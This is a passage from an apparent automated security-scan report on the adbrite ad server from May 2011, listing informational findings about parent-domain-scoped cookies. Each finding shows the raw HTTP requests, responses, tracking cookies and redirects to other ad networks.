Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:56:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:56:59 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLFRr%2FA0oVdMNFlAJuP69ttfJZOaEQ0F%2FwtuVvMYxQQ%2FDPHdTkOZgDDTtlZGlSCpFZPyUl%2FdsGHGrIgRd8y11OhIrxkYkckQ3sVte%2Bcmt1WKYqV1K%2B%2FA3HuVOvxoIsMZ7F5f%2FEK7rCw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:56:59 GMT
Set-Cookie: vsd=0@1@4dbe0f6b@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 01:56:59 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.13. http://ads.adbrite.com/adserver/behavioral-data/8204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8204

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/behavioral-data/8204?d=1000,2,3,4,500,93 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=ChQKBjY4Mjg2NRjdreS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx%7Clkjq00"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3ATc1LCoAgFEDRvbyxAz9B0G6MjNTSyn6i7j3LBk0PF26Ag0ITQAt%2F2rVz0IDTbJsjWcahvyKJOFaTxRg5RWv2Z9LvNrOU5mNfWOmn5rTjhUXhHAOClhsjVvmOIKUb"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:39:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3Abc9BDoMgEAXQu8zaBWDRxNtQhYrUoRW1NeLdK8UmJHX7%2Fp%2BfzAozg2oFI5eXHRoHFTiTjw9Pn%2FdWvT31xF96S0jmOlbmKVM12Z21xoOXyJ3Z23WL3DA%2B3kKkpyJEP9Q8RSdYI%2BKAjANh9qgqe3Kv%2BjPEfyzKOkHI4CoQ5aC%2Fb8K2fQA%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:39:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.14. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=ChQKBjY4Mjg2NRi5teS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx%7Clkjq01"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3Abc9NDoMgEAXgu8zaBWCpibehCorUoRVta8S7%2B4MmJHX7vTcvmQk%2BDPIJjBy%2Ftisd5OBM2r88fT9r9fPUE39rLSGJa1iWxkzVYFfWGg8eAzdmbRc1csN4X%2B1RRbboRM1jdIKVIgzIMLDNHlVlL%2B5Ve4X4j%2FesiBASeAhE2en9TZjnBQ%3D%3D"
Host: ads.adbrite.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:09:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRimxOS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:38 GMT
Set-Cookie: ut="1%3Abc9NDoMgEAXgu8zaBWCpibehCorUoRVta8S7%2B4MmJHX7vTcvmQk%2BDPIJjBy%2Ftisd5OBM2r88fT9r9fPUE39rLSGJa1iWxkzVYFfWGg8eAzdmbRc1csO45ntUkS06sa9idIKVIgzIMLDNHlVlL%2B5Ve4X4j%2FesiBASeAhE2en9TZjnBQ%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:09:38 GMT
Content-Length: 0

16.15. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjkKBjY4NDMzORijmeS6DiIpdXVpZD00ZDUwMzg0Yi00YjVlLTBmNjctOTE5YS03Mjc1NTg5YzBiODUKMAoGNzYyNzAxGJL7-s0TIiA0OTUyNkIxQjNGREQwM0ZCQzE0RERDNTAwODlCQzg1MAohCgY3NzkwNDUYp4v6zRMiETE3NjA4ODQzOTEzMTMyNTM0CjQKBjgwNjIwNRj10Pi3GCIkMzcyOGU3NGMtNzQ2MS0xMWUwLTkxODUtMDAyNTkwMDlhOWU0EAE; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx"; rb="0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3ATc1LCoAgFEDRvbyxAz9B0G6MjNTSyn6i7j3LBk0PF26Ag0ITQAt%2F2rVz0IDTbJsjWcahvyKJOFaTxRg5RWv2Z9LvNrOU5mNfWOmn5rTjhUXhHAOClhsjVvmOIKUb"
Host: ads.adbrite.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:09:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRjqq-S6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:35 GMT
Set-Cookie: rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:35 GMT
Content-Length: 0

16.16. http://ads.adbrite.com/adserver/vdi/684339  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"
Host: ads.adbrite.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:37:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjkKBjY4NDMzORjps8q7DiIpdXVpZD00ZDUwMzg0Yi00YjVlLTBmNjctOTE5YS03Mjc1NTg5YzBiODUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:27 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0"; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:27 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.17. http://ads.adbrite.com/adserver/vdi/711384  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3A%2F%2Fa.triggit.com%2Fpxabcm%3Fabid%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:04:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://a.triggit.com/pxabcm?abid=MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBjlpurNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:04:56 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:04:56 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 02:04:56 GMT
Content-Length: 0

16.18. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:21:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiu4KfOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:21:42 GMT
Set-Cookie: vsd=0@3@4dbe1536@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:21:42 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.19. http://ads.adbrite.com/adserver/vdi/779045  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/779045?d=17608843913132534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:37:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CiEKBjc3OTA0NRjjmuLOEyIRMTc2MDg4NDM5MTMxMzI1MzQQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:40 GMT
